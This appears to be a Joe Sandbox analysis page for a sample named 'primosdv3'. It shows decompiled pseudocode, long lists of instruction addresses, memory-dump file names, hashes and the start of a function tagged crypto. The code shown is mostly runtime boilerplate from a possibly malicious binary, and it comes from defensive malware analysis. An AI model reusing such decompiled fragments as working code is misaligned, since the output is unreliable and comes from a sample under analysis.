									_t767 =  *0xcc2278; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1235 * 4)) + 0x20);
									_t770 =  *0xcc2278; // 0x0
									E00C88DCC( *((intOrPtr*)(_t770 + _t1235 * 4)));
									_pop(_t1071);
									_t772 =  *0xcc2278; // 0x0
									_t737 = _t772 + _t1235 * 4;
									 *_t737 =  *(_t772 + _t1235 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1235 = _t1235 + 1;
							}
							_v8 = 0xfffffffe;
							E00C8ED21();
							return E00C7F640(_v32);
						} else {
							L309:
							_t1284 = _v1936;
							_pop(_t1187);
							_pop(_t1236);
							_pop(_t1056);
							if(_v1936 != 0) {
								_t755 = E00C8F381(_t1070, _t1284,  &_v1944);
							}
							return E00C7FBBC(_t755, _t1056, _v8 ^ _t1271, _t1142, _t1187, _t1236);
						}
					}
				}
			}

0x00c8d8ee
0x00c8d8f1
0x00c8d8f3
0x00c8d8f9
0x00c8d900
0x00c8d903
0x00c8d904
0x00c8d90d
0x00c8d90e
0x00c8d90f
0x00c8d912
0x00c8d918
0x00c8d91e
0x00c8d923
0x00c8d932
0x00c8d934
0x00c8d936
0x00c8d936
0x00c8d93d
0x00c8d947
0x00c8d94c
0x00c8d94f
0x00c8d973
0x00c8d977
0x00c8d97c
0x00c8d97d
0x00c8d97f
0x00c8d981
0x00c8d987
0x00c8d987
0x00c8d98e
0x00c8d98e
0x00c8d991
0x00c8ec41
0x00000000
0x00c8d997
0x00c8d997
0x00c8d997
0x00c8d99a
0x00c8ec3a
0x00000000
0x00c8d9a0
0x00c8d9a0
0x00c8d9a0
0x00c8d9a3
0x00c8ec33
0x00000000
0x00c8d9a9
0x00c8d9a9
0x00c8d9ac
0x00c8ec2c
0x00000000
0x00c8d9b2
0x00c8d9bb
0x00c8d9c3
0x00c8d9c6
0x00c8d9c9
0x00c8d9cc
0x00c8d9d2
0x00c8d9da
0x00c8d9e0
0x00c8d9ea
0x00c8d9ea
0x00c8d9ed
0x00c8d9f5
0x00c8d9fc
0x00c8d9fc
0x00c8d9ef
0x00c8d9ef
0x00c8d9f1
0x00c8da04
0x00c8da0a
0x00c8da0c
0x00c8da10
0x00c8da15
0x00c8da22
0x00c8da24
0x00c8da2a
0x00c8da2f
0x00c8da31
0x00c8da34
0x00c8da3a
0x00c8da3b
0x00c8da40
0x00c8da46
0x00c8da4b
0x00c8da54
0x00c8da54
0x00c8da56
0x00c8da4d
0x00c8da4d
0x00c8da52
0x00000000
0x00000000
0x00c8da52
0x00c8da5c
0x00c8da64
0x00c8da66
0x00c8da6f
0x00c8da70
0x00c8da76
0x00c8da78
0x00c8de6b
0x00c8de71
0x00c8df90
0x00c8df90
0x00c8df97
0x00c8df97
0x00c8df97
0x00c8df9e
0x00c8dfa1
0x00c8dfa8
0x00c8dfa8
0x00c8dfa3
0x00c8dfa3
0x00c8dfa3
0x00c8dfac
0x00c8dfad
0x00c8dfaf
0x00c8dfb2
0x00c8dfb5
0x00c8dfb8
0x00c8dfbe
0x00c8dfc1
0x00c8dfc4
0x00c8dfce
0x00c8dfce
0x00c8dfce
0x00c8dfc6
0x00c8dfc6
0x00c8dfc8
0x00000000
0x00c8dfca
0x00c8dfca
0x00c8dfca
0x00c8dfc8
0x00c8dfd0
0x00c8dfd2
0x00c8e073
0x00c8e073
0x00c8e080
0x00c8e080
0x00c8e080
0x00c8e096
0x00c8e09b
0x00c8dfd8
0x00c8dfd8
0x00c8dfda
0x00000000
0x00c8dfe0
0x00c8dfe2
0x00c8dfe3
0x00c8dfe5
0x00c8dfe7
0x00c8dfe7
0x00c8dfe9
0x00c8dfec
0x00c8dff4
0x00c8dff6
0x00c8dff9
0x00c8dfff
0x00c8dfff
0x00c8e001
0x00c8e00d
0x00c8e00d
0x00c8e00d
0x00c8e003
0x00c8e005
0x00c8e005
0x00c8e014
0x00c8e017
0x00c8e019
0x00c8e020
0x00c8e020
0x00c8e01b
0x00c8e01b
0x00c8e01b
0x00c8e028
0x00c8e032
0x00c8e038
0x00c8e039
0x00c8e03e
0x00c8e044
0x00c8e047
0x00000000
0x00000000
0x00c8e049
0x00c8e049
0x00c8e051
0x00c8e051
0x00c8e057
0x00c8e05e
0x00c8e06b
0x00c8e060
0x00c8e060
0x00c8e063
0x00c8e063
0x00c8e05e
0x00c8dfda
0x00c8e0a7
0x00c8e0b7
0x00c8e0c4
0x00c8e0c6
0x00c8e0cd
0x00c8de77
0x00c8de77
0x00c8de80
0x00c8de81
0x00c8de8b
0x00c8de91
0x00c8de93
0x00c8de99
0x00c8de99
0x00c8de9b
0x00c8de9b
0x00c8dea2
0x00c8dea9
0x00000000
0x00000000
0x00c8deaf
0x00c8deb2
0x00c8deb5
0x00000000
0x00c8deb7
0x00c8deb7
0x00c8deb7
0x00c8deb7
0x00c8debe
0x00c8dec1
0x00c8dec8
0x00c8dec8
0x00c8dec3
0x00c8dec3
0x00c8dec3
0x00c8decc
0x00c8decf
0x00c8ded1
0x00c8ded3
0x00c8ded9
0x00c8dedf
0x00c8dee1
0x00c8dee1
0x00c8dee1
0x00c8dee8
0x00c8dee8
0x00c8deea
0x00c8def6
0x00c8def6
0x00c8def6
0x00c8deec
0x00c8deee
0x00c8deee
0x00c8defd
0x00c8df00
0x00c8df02
0x00c8df09
0x00c8df09
0x00c8df04
0x00c8df04
0x00c8df04
0x00c8df11
0x00c8df1c
0x00c8df22
0x00c8df23
0x00c8df28
0x00c8df2e
0x00c8df31
0x00000000
0x00000000
0x00c8df33
0x00c8df33
0x00c8df3d
0x00c8df48
0x00c8df50
0x00c8df56
0x00c8df61
0x00c8df67
0x00c8df6e
0x00c8df81
0x00c8df88
0x00c8df88
0x00000000
0x00c8deb5
0x00c8de9b
0x00000000
0x00c8de93
0x00c8e0d0
0x00c8e0d0
0x00c8e0d6
0x00c8e0db
0x00c8e0e1
0x00c8e0f4
0x00c8e0f9
0x00c8da7e
0x00c8da7e
0x00c8da87
0x00c8da88
0x00c8da92
0x00c8da98
0x00c8da9a
0x00c8dca0
0x00c8dca8
0x00c8dcab
0x00c8dcb0
0x00c8dcb3
0x00c8dcbb
0x00c8dcbf
0x00c8dcc5
0x00c8dccb
0x00c8dcd0
0x00c8dcd7
0x00c8dcd8
0x00c8dcd8
0x00c8dcd8
0x00c8dcdf
0x00c8dce2
0x00c8dcea
0x00c8dcf0
0x00c8dcf5
0x00c8dcf5
0x00c8dcf2
0x00c8dcf2
0x00c8dcf2
0x00c8dcf9
0x00c8dcfa
0x00c8dcfc
0x00c8dcff
0x00c8dd05
0x00c8dd0b
0x00c8dd0e
0x00c8dd11
0x00c8dd17
0x00c8dd1a
0x00c8dd1d
0x00c8dd27
0x00c8dd27
0x00c8dd27
0x00c8dd1f
0x00c8dd1f
0x00c8dd21
0x00000000
0x00c8dd23
0x00c8dd23
0x00c8dd23
0x00c8dd21
0x00c8dd29
0x00c8dd2b
0x00c8de1d
0x00c8de1d
0x00c8de1f
0x00c8de25
0x00c8de2b
0x00c8de40
0x00c8de45
0x00c8dd31
0x00c8dd31
0x00c8dd33
0x00000000
0x00c8dd39
0x00c8dd3b
0x00c8dd3c
0x00c8dd3e
0x00c8dd40
0x00c8dd42
0x00c8dd42
0x00c8dd48
0x00c8dd4a
0x00c8dd50
0x00c8dd53
0x00c8dd61
0x00c8dd67
0x00c8dd67
0x00c8dd69
0x00c8dd6c
0x00c8dd72
0x00c8dd72
0x00c8dd74
0x00000000
0x00000000
0x00c8dd76
0x00c8dd78
0x00c8dd7e
0x00c8dd7e
0x00c8dd7a
0x00c8dd7a
0x00c8dd7a
0x00c8dd83
0x00c8dd85
0x00c8dd8c
0x00c8dd8c
0x00c8dd87
0x00c8dd87
0x00c8dd87
0x00c8ddb2
0x00c8ddb8
0x00c8ddbb
0x00c8ddc1
0x00c8ddc8
0x00c8ddc9
0x00c8ddca
0x00c8ddd0
0x00c8ddd3
0x00c8ddd5
0x00000000
0x00c8ddd5
0x00000000
0x00c8ddd3
0x00c8dddd
0x00c8dde3
0x00c8ddeb
0x00c8ddeb
0x00c8ddec
0x00c8ddee
0x00c8ddf2
0x00c8ddfa
0x00c8ddfa
0x00c8ddfa
0x00c8ddfc
0x00c8de03
0x00c8de08
0x00c8de15
0x00c8de0a
0x00c8de0d
0x00c8de0d
0x00c8de08
0x00c8dd33
0x00c8de48
0x00c8de52
0x00c8de58
0x00c8de5e
0x00c8de64
0x00c8daa0
0x00c8daa0
0x00c8daa0
0x00c8daa2
0x00c8daa9
0x00c8dab0
0x00000000
0x00000000
0x00c8dab6
0x00c8dab9
0x00c8dabc
0x00000000
0x00c8dabe
0x00c8dac6
0x00c8dacb
0x00c8dad0
0x00c8dad1
0x00c8dad3
0x00c8dadb
0x00c8dadf
0x00c8dae5
0x00c8daeb
0x00c8daf0
0x00c8daf7
0x00c8daf7
0x00c8daf8
0x00c8dafb
0x00c8db03
0x00c8db09
0x00c8db0e
0x00c8db0e
0x00c8db0b
0x00c8db0b
0x00c8db0b
0x00c8db12
0x00c8db13
0x00c8db15
0x00c8db18
0x00c8db1e
0x00c8db24
0x00c8db27
0x00c8db2a
0x00c8db30
0x00c8db33
0x00c8db36
0x00c8db40
0x00c8db40
0x00c8db40
0x00c8db38
0x00c8db38
0x00c8db3a
0x00000000
0x00c8db3c
0x00c8db3c
0x00c8db3c
0x00c8db3a
0x00c8db42
0x00c8db44
0x00c8dc39
0x00c8dc39
0x00c8dc3b
0x00c8dc41
0x00c8dc47
0x00c8dc5c
0x00c8dc61
0x00c8db4a
0x00c8db4a
0x00c8db4c
0x00000000
0x00c8db52
0x00c8db54
0x00c8db55
0x00c8db57
0x00c8db59
0x00c8db5b
0x00c8db5b
0x00c8db61
0x00c8db63
0x00c8db69
0x00c8db6c
0x00c8db7a
0x00c8db80
0x00c8db80
0x00c8db82
0x00c8db85
0x00c8db8b
0x00c8db8b
0x00c8db8d
0x00000000
0x00000000
0x00c8db8f
0x00c8db91
0x00c8db97
0x00c8db97
0x00c8db93
0x00c8db93
0x00c8db93
0x00c8db9c
0x00c8db9e
0x00c8dbab
0x00c8dbab
0x00c8dba0
0x00c8dba6
0x00c8dba6
0x00c8dbc9
0x00c8dbd1
0x00c8dbd8
0x00c8dbdf
0x00c8dbe0
0x00c8dbe3
0x00c8dbe9
0x00c8dbef
0x00c8dbf2
0x00c8dbf4
0x00000000
0x00c8dbf4
0x00000000
0x00c8dbf2
0x00c8dbfc
0x00c8dc02
0x00c8dc02
0x00c8dc08
0x00c8dc0a
0x00c8dc14
0x00c8dc16
0x00c8dc16
0x00c8dc16
0x00c8dc18
0x00c8dc1f
0x00c8dc24
0x00c8dc31
0x00c8dc26
0x00c8dc29
0x00c8dc29
0x00c8dc24
0x00c8db4c
0x00c8dc64
0x00c8dc6f
0x00c8dc70
0x00c8dc71
0x00c8dc77
0x00c8dc7d
0x00c8dc83
0x00c8dc83
0x00000000
0x00c8dabc
0x00000000
0x00c8daa2
0x00c8dc84
0x00c8dc8a
0x00c8dc91
0x00c8dc92
0x00c8dc93
0x00c8dc98
0x00c8dc98
0x00c8e0fc
0x00c8e106
0x00c8e107
0x00c8e10d
0x00c8e10f
0x00c8e578
0x00c8e57a
0x00c8e57c
0x00c8e582
0x00c8e584
0x00c8e58a
0x00c8e58c
0x00c8e8de
0x00c8e8de
0x00c8e8e0
0x00c8e8e6
0x00c8e8ed
0x00c8e8f3
0x00c8e8f5
0x00c8e993
0x00c8e993
0x00c8e995
0x00c8e996
0x00c8e99c
0x00000000
0x00c8e8fb
0x00c8e8fb
0x00c8e8fe
0x00c8e904
0x00c8e90a
0x00c8e90c
0x00c8e912
0x00c8e914
0x00c8e914
0x00c8e916
0x00c8e916
0x00c8e91f
0x00c8e926
0x00c8e92c
0x00c8e92f
0x00c8e930
0x00c8e932
0x00c8e932
0x00c8e936
0x00c8e938
0x00c8e93a
0x00c8e940
0x00c8e943
0x00000000
0x00c8e945
0x00c8e945
0x00c8e94c
0x00c8e94c
0x00c8e943
0x00c8e938
0x00c8e90c
0x00c8e8fe
0x00c8e8f5
0x00c8e592
0x00c8e592
0x00c8e592
0x00c8e595
0x00c8e599
0x00c8e599
0x00c8e59a
0x00c8e5ac
0x00c8e5b9
0x00c8e5c8
0x00c8e5f2
0x00c8e5f7
0x00c8e5fd
0x00c8e600
0x00c8e606
0x00c8e609
0x00c8e6a2
0x00c8e6a9
0x00c8e727
0x00c8e72d
0x00c8e733
0x00c8e736
0x00c8e738
0x00c8e7c1
0x00c8e73e
0x00c8e73e
0x00c8e744
0x00c8e744
0x00c8e74a
0x00c8e750
0x00c8e752
0x00c8e754
0x00c8e754
0x00c8e75a
0x00c8e760
0x00c8e762
0x00c8e76a
0x00c8e76a
0x00c8e770
0x00c8e772
0x00c8e774
0x00c8e77a
0x00c8e77c
0x00c8e893
0x00c8e895
0x00c8e89b
0x00c8e89b
0x00c8e89e
0x00c8e89f
0x00000000
0x00c8e782
0x00c8e788
0x00c8e788
0x00c8e78a
0x00c8e790
0x00c8e793
0x00c8e79a
0x00c8e7a0
0x00c8e7a2
0x00c8e7c9
0x00c8e7cb
0x00c8e7cd
0x00c8e7cf
0x00c8e7d5
0x00c8e7db
0x00c8e875
0x00c8e875
0x00c8e878
0x00000000
0x00c8e87e
0x00c8e87e
0x00c8e884
0x00000000
0x00c8e884
0x00c8e7e1
0x00c8e7e1
0x00c8e7e1
0x00c8e7e4
0x00000000
0x00000000
0x00c8e7e6
0x00c8e7e8
0x00c8e7ea
0x00c8e7f3
0x00c8e7f3
0x00c8e7f5
0x00c8e7fb
0x00c8e7fb
0x00c8e807
0x00c8e812
0x00c8e815
0x00c8e822
0x00c8e825
0x00c8e826
0x00c8e827
0x00c8e82d
0x00c8e82f
0x00c8e835
0x00c8e83b
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8e83d
0x00c8e83d
0x00c8e83d
0x00c8e83f
0x00000000
0x00000000
0x00c8e841
0x00c8e844
0x00000000
0x00c8e84a
0x00c8e84a
0x00c8e84c
0x00c8e84e
0x00c8e84e
0x00c8e84e
0x00c8e856
0x00c8e859
0x00c8e859
0x00c8e85f
0x00c8e861
0x00c8e863
0x00c8e86a
0x00c8e870
0x00c8e872
0x00000000
0x00c8e872
0x00000000
0x00c8e844
0x00000000
0x00c8e83d
0x00000000
0x00c8e7e1
0x00c8e7a4
0x00c8e7a4
0x00c8e7a6
0x00c8e7ac
0x00c8e7b3
0x00c8e7b3
0x00c8e7b6
0x00c8e7b6
0x00000000
0x00c8e7a6
0x00000000
0x00c8e88a
0x00c8e88a
0x00c8e88b
0x00c8e88b
0x00000000
0x00c8e790
0x00c8e6ab
0x00c8e6ab
0x00c8e6bd
0x00c8e6cc
0x00c8e6d1
0x00c8e6d4
0x00c8e6d6
0x00000000
0x00c8e6dc
0x00c8e6dc
0x00c8e6df
0x00000000
0x00c8e6e5
0x00c8e6e5
0x00c8e6ec
0x00000000
0x00c8e6f2
0x00c8e6f8
0x00c8e6fa
0x00c8e700
0x00c8e700
0x00c8e702
0x00c8e702
0x00c8e704
0x00c8e70d
0x00c8e714
0x00c8e717
0x00c8e718
0x00c8e71a
0x00c8e71a
0x00000000
0x00c8e722
0x00c8e6ec
0x00c8e6df
0x00c8e6d6
0x00c8e60f
0x00c8e60f
0x00c8e615
0x00c8e617
0x00c8e633
0x00c8e636
0x00000000
0x00c8e63c
0x00c8e63c
0x00c8e643
0x00000000
0x00c8e649
0x00c8e64f
0x00c8e651
0x00c8e657
0x00c8e657
0x00c8e659
0x00c8e659
0x00c8e65b
0x00c8e664
0x00c8e66b
0x00c8e66e
0x00c8e66f
0x00c8e671
0x00c8e671
0x00c8e679
0x00c8e679
0x00c8e67b
0x00000000
0x00c8e681
0x00c8e681
0x00c8e687
0x00c8e68a
0x00c8e954
0x00c8e957
0x00c8e95d
0x00c8e972
0x00c8e977
0x00c8e97a
0x00c8e690
0x00c8e690
0x00c8e697
0x00000000
0x00c8e697
0x00c8e68a
0x00c8e67b
0x00c8e643
0x00c8e619
0x00c8e619
0x00c8e61b
0x00c8e621
0x00c8e627
0x00c8e628
0x00c8e8a5
0x00c8e8a5
0x00c8e8ac
0x00c8e8ad
0x00c8e8ae
0x00c8e8b3
0x00c8e8b6
0x00c8e8b6
0x00c8e8b6
0x00c8e617
0x00c8e8b8
0x00c8e8b8
0x00c8e8ba
0x00c8e981
0x00c8e988
0x00c8e98f
0x00c8e9a2
0x00c8e9a8
0x00c8e9a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8e8c0
0x00c8e8c6
0x00c8e8c6
0x00c8e8cc
0x00c8e8cc
0x00c8e8d8
0x00000000
0x00c8e8d8
0x00c8e115
0x00c8e115
0x00c8e117
0x00c8e11d
0x00c8e11f
0x00c8e125
0x00c8e127
0x00c8e49e
0x00c8e49e
0x00c8e4a0
0x00c8e4a6
0x00c8e4ad
0x00c8e4af
0x00c8e50e
0x00c8e511
0x00c8e517
0x00c8e51d
0x00c8e523
0x00c8e525
0x00c8e52b
0x00c8e52d
0x00c8e52d
0x00c8e52f
0x00c8e52f
0x00c8e531
0x00c8e53a
0x00c8e541
0x00c8e544
0x00c8e545
0x00c8e547
0x00c8e547
0x00c8e54f
0x00c8e551
0x00c8e557
0x00c8e55d
0x00c8e560
0x00000000
0x00c8e566
0x00c8e566
0x00c8e56d
0x00c8e56d
0x00c8e560
0x00c8e551
0x00c8e525
0x00c8e4b1
0x00c8e4b1
0x00c8e4b3
0x00c8e4b9
0x00c8e4bf
0x00000000
0x00c8e4bf
0x00c8e4af
0x00c8e12d
0x00c8e12d
0x00c8e12d
0x00c8e130
0x00c8e134
0x00c8e134
0x00c8e135
0x00c8e147
0x00c8e154
0x00c8e163
0x00c8e18d
0x00c8e192
0x00c8e198
0x00c8e19b
0x00c8e1a1
0x00c8e1a4
0x00c8e220
0x00c8e227
0x00c8e2eb
0x00c8e2f1
0x00c8e2f7
0x00c8e2fa
0x00c8e2fc
0x00c8e385
0x00c8e302
0x00c8e302
0x00c8e308
0x00c8e308
0x00c8e30e
0x00c8e314
0x00c8e316
0x00c8e318
0x00c8e318
0x00c8e31e
0x00c8e324
0x00c8e326
0x00c8e32e
0x00c8e32e
0x00c8e334
0x00c8e336
0x00c8e338
0x00c8e33e
0x00c8e340
0x00c8e457
0x00c8e459
0x00c8e45f
0x00c8e45f
0x00000000
0x00c8e346
0x00c8e34c
0x00c8e34c
0x00c8e34e
0x00c8e354
0x00c8e357
0x00c8e35e
0x00c8e364
0x00c8e366
0x00c8e38d
0x00c8e38f
0x00c8e391
0x00c8e393
0x00c8e399
0x00c8e39f
0x00c8e439
0x00c8e439
0x00c8e43c
0x00000000
0x00c8e442
0x00c8e442
0x00c8e448
0x00000000
0x00c8e448
0x00c8e3a5
0x00c8e3a5
0x00c8e3a5
0x00c8e3a8
0x00000000
0x00000000
0x00c8e3aa
0x00c8e3ac
0x00c8e3ae
0x00c8e3b7
0x00c8e3b7
0x00c8e3b9
0x00c8e3bf
0x00c8e3bf
0x00c8e3cb
0x00c8e3d6
0x00c8e3d9
0x00c8e3e6
0x00c8e3e9
0x00c8e3ea
0x00c8e3eb
0x00c8e3f1
0x00c8e3f3
0x00c8e3f9
0x00c8e3ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8e401
0x00c8e401
0x00c8e401
0x00c8e403
0x00000000
0x00000000
0x00c8e405
0x00c8e408
0x00c8e4c2
0x00c8e4c2
0x00c8e4c4
0x00c8e4ca
0x00c8e4d0
0x00c8e4d1
0x00000000
0x00c8e40e
0x00c8e40e
0x00c8e410
0x00c8e412
0x00c8e412
0x00c8e412
0x00c8e41a
0x00c8e41d
0x00c8e41d
0x00c8e423
0x00c8e425
0x00c8e427
0x00c8e42e
0x00c8e434
0x00c8e436
0x00000000
0x00c8e436
0x00000000
0x00c8e408
0x00000000
0x00c8e401
0x00000000
0x00c8e3a5
0x00c8e368
0x00c8e368
0x00c8e36a
0x00c8e370
0x00c8e377
0x00c8e377
0x00c8e37a
0x00c8e37a
0x00000000
0x00c8e36a
0x00000000
0x00c8e44e
0x00c8e44e
0x00c8e44f
0x00c8e44f
0x00000000
0x00c8e354
0x00c8e22d
0x00c8e22d
0x00c8e23f
0x00c8e24e
0x00c8e253
0x00c8e256
0x00c8e258
0x00c8e274
0x00c8e277
0x00000000
0x00c8e27d
0x00c8e27d
0x00c8e284
0x00000000
0x00c8e28a
0x00c8e290
0x00c8e292
0x00c8e298
0x00c8e298
0x00c8e29a
0x00c8e29a
0x00c8e29c
0x00c8e2a5
0x00c8e2ac
0x00c8e2af
0x00c8e2b0
0x00c8e2b2
0x00c8e2b2
0x00000000
0x00c8e29a
0x00c8e284
0x00c8e25a
0x00c8e25c
0x00c8e262
0x00c8e268
0x00c8e269
0x00000000
0x00c8e269
0x00c8e258
0x00c8e1a6
0x00c8e1a6
0x00c8e1ac
0x00c8e1ae
0x00c8e1c3
0x00c8e1c6
0x00000000
0x00c8e1cc
0x00c8e1cc
0x00c8e1d3
0x00000000
0x00c8e1d9
0x00c8e1df
0x00c8e1e1
0x00c8e1e7
0x00c8e1e7
0x00c8e1e9
0x00c8e1e9
0x00c8e1eb
0x00c8e1f4
0x00c8e1fb
0x00c8e1fe
0x00c8e1ff
0x00c8e201
0x00c8e201
0x00c8e2ba
0x00c8e2ba
0x00c8e2bc
0x00000000
0x00c8e2c2
0x00c8e2c2
0x00c8e2c8
0x00c8e2cb
0x00c8e20e
0x00c8e215
0x00000000
0x00c8e2d1
0x00c8e2d3
0x00c8e2d9
0x00c8e2df
0x00c8e2e0
0x00c8e4d7
0x00c8e4d7
0x00c8e4de
0x00c8e4df
0x00c8e4e0
0x00c8e4e5
0x00c8e4e8
0x00c8e4e8
0x00c8e2cb
0x00c8e2bc
0x00c8e1d3
0x00c8e1b0
0x00c8e1b0
0x00c8e1b2
0x00c8e1b8
0x00c8e462
0x00c8e462
0x00c8e463
0x00c8e469
0x00c8e469
0x00c8e470
0x00c8e471
0x00c8e472
0x00c8e477
0x00c8e47a
0x00c8e47a
0x00c8e47a
0x00c8e1ae
0x00c8e47c
0x00c8e47c
0x00c8e47e
0x00c8e4ec
0x00c8e4f3
0x00c8e4f3
0x00c8e4f3
0x00c8e4fa
0x00c8e4fc
0x00c8e502
0x00c8e503
0x00c8e9af
0x00c8e9af
0x00c8e9b0
0x00c8e9b1
0x00c8e9b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8e480
0x00c8e486
0x00c8e486
0x00c8e48c
0x00c8e48c
0x00c8e498
0x00000000
0x00c8e498
0x00c8e127
0x00c8e9b9
0x00c8e9b9
0x00c8e9bf
0x00c8e9c1
0x00c8e9c7
0x00c8e9cd
0x00c8e9cf
0x00c8e9d1
0x00c8e9d3
0x00c8e9d3
0x00c8e9d5
0x00c8e9d5
0x00c8e9de
0x00c8e9df
0x00c8e9e3
0x00c8e9ea
0x00c8e9ed
0x00c8e9ee
0x00c8e9f0
0x00c8e9f0
0x00c8e9f4
0x00c8e9fa
0x00c8e9fc
0x00c8ea02
0x00c8ea04
0x00c8ea0a
0x00c8ea0d
0x00c8ea20
0x00c8ea23
0x00c8ea29
0x00c8ea3e
0x00c8ea43
0x00c8ea0f
0x00c8ea11
0x00c8ea18
0x00c8ea18
0x00c8ea0d
0x00c8ea46
0x00c8ea46
0x00c8ea56
0x00c8ea5f
0x00c8ea60
0x00c8ea62
0x00c8eaf9
0x00c8eafb
0x00c8eb06
0x00c8eb06
0x00c8eb08
0x00c8eb0b
0x00c8eb0d
0x00000000
0x00c8eafd
0x00c8eb03
0x00c8eb03
0x00c8ea68
0x00c8ea68
0x00c8ea6e
0x00c8ea71
0x00c8ea77
0x00c8ea7a
0x00c8ea80
0x00c8ea82
0x00c8ea88
0x00c8ea8a
0x00c8ea8c
0x00c8ea8c
0x00c8ea8e
0x00c8ea8e
0x00c8ea9b
0x00c8eaa2
0x00c8eaa5
0x00c8eaa6
0x00c8eaa8
0x00c8eaa9
0x00c8eaa9
0x00c8eaad
0x00c8eab3
0x00c8eab5
0x00c8eab7
0x00c8eabd
0x00c8eac0
0x00c8ead4
0x00c8eada
0x00c8eaef
0x00c8eaf4
0x00c8eac2
0x00c8eac2
0x00c8eac9
0x00c8eac9
0x00c8eac0
0x00c8eab5
0x00c8eb13
0x00c8eb13
0x00c8eb13
0x00c8eb1f
0x00c8eb22
0x00c8eb28
0x00c8eb2a
0x00c8eb2c
0x00c8eb32
0x00c8eb34
0x00c8eb34
0x00c8eb34
0x00c8eb32
0x00c8eb39
0x00c8eb3a
0x00c8eb3c
0x00c8eb3e
0x00c8eb3e
0x00c8eb40
0x00c8eb46
0x00c8eb4c
0x00c8eb4e
0x00c8eb54
0x00c8eb54
0x00c8eb5a
0x00c8eb5c
0x00000000
0x00000000
0x00c8eb62
0x00c8eb64
0x00c8eb66
0x00c8eb66
0x00c8eb68
0x00c8eb68
0x00c8eb78
0x00c8eb7f
0x00c8eb82
0x00c8eb83
0x00c8eb85
0x00c8eb85
0x00c8eb89
0x00c8eb8f
0x00c8eb91
0x00c8eb93
0x00c8eb99
0x00c8eb9c
0x00c8ebad
0x00c8ebb0
0x00c8ebb6
0x00c8ebcb
0x00c8ebd0
0x00c8eb9e
0x00c8eb9e
0x00c8eba5
0x00c8eba5
0x00c8eb9c
0x00c8ebe1
0x00c8ebf0
0x00c8ebf1
0x00c8ebf1
0x00c8ebf3
0x00c8ebf5
0x00c8ebf5
0x00c8ebfb
0x00c8ebfe
0x00c8ec00
0x00c8ec02
0x00c8ec02
0x00c8ec05
0x00c8ec06
0x00c8ec06
0x00c8ec0b
0x00c8ec0e
0x00c8ec12
0x00c8ec12
0x00c8ec13
0x00c8ec15
0x00c8ec1b
0x00c8ec21
0x00000000
0x00000000
0x00000000
0x00c8ec21
0x00c8eb54
0x00c8ec27
0x00c8ec27
0x00000000
0x00c8ec27
0x00c8d9ac
0x00c8d9a3
0x00c8d99a
0x00c8d951
0x00c8d955
0x00c8d95d
0x00000000
0x00c8d95f
0x00c8d965
0x00c8d96a
0x00c8ec46
0x00c8ec46
0x00c8ec49
0x00c8ec54
0x00c8ec7f
0x00c8ec80
0x00c8ec81
0x00c8ec82
0x00c8ec83
0x00c8ec84
0x00c8ec89
0x00c8ec8a
0x00c8ec91
0x00c8ec96
0x00c8ec9c
0x00c8eca1
0x00c8eca2
0x00c8eca2
0x00c8eca2
0x00c8eca8
0x00c8eca9
0x00c8eca9
0x00c8ecac
0x00c8ecb2
0x00000000
0x00000000
0x00c8ecb4
0x00c8ecb9
0x00c8ecbc
0x00c8ecbe
0x00c8ecc6
0x00c8ecc8
0x00c8ecca
0x00c8eccf
0x00c8ecd2
0x00c8ecd8
0x00c8ecdb
0x00c8ecdd
0x00c8ecdd
0x00c8ecdd
0x00c8ecdd
0x00c8ecdb
0x00c8ece0
0x00c8ecec
0x00c8ecf2
0x00c8ecfa
0x00c8ecff
0x00c8ed00
0x00c8ed05
0x00c8ed05
0x00c8ed05
0x00c8ed05
0x00c8ed09
0x00c8ed09
0x00c8ed0c
0x00c8ed13
0x00c8ed20
0x00c8ec56
0x00c8ec56
0x00c8ec56
0x00c8ec5d
0x00c8ec5e
0x00c8ec5f
0x00c8ec60
0x00c8ec69
0x00c8ec6e
0x00c8ec7c
0x00c8ec7c
0x00c8ec54
0x00c8d95d

APIs

__floor_pentium4.LIBCMT ref: 00C8DA34

Strings

1#QNAN, xrefs: 00C8EC3A
1#INF, xrefs: 00C8EC41
1#SNAN, xrefs: 00C8EC33
1#IND, xrefs: 00C8EC2C

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a55072c59118bfd756276f508d62367ccbb07d751bc4ab189725f59e9ff60ca2
Instruction ID: 8395578d426691d04ae0d01866cab0e6886770a9bc4f13ab230e7db5fca3e5ed
Opcode Fuzzy Hash: a55072c59118bfd756276f508d62367ccbb07d751bc4ab189725f59e9ff60ca2
Instruction Fuzzy Hash: F0C25D71E046288FDB25EF28DD407EAB7B5EB84309F1541EAD45EE7280E774AE818F44

Uniqueness

Uniqueness Score: -1.00%

Function 00C632F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00C632F7(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				void* _t237;
				signed int _t240;
				void* _t246;
				unsigned int _t248;
				unsigned int _t252;
				void* _t253;
				signed int _t257;
				char _t269;
				signed int _t277;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t319;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t335;
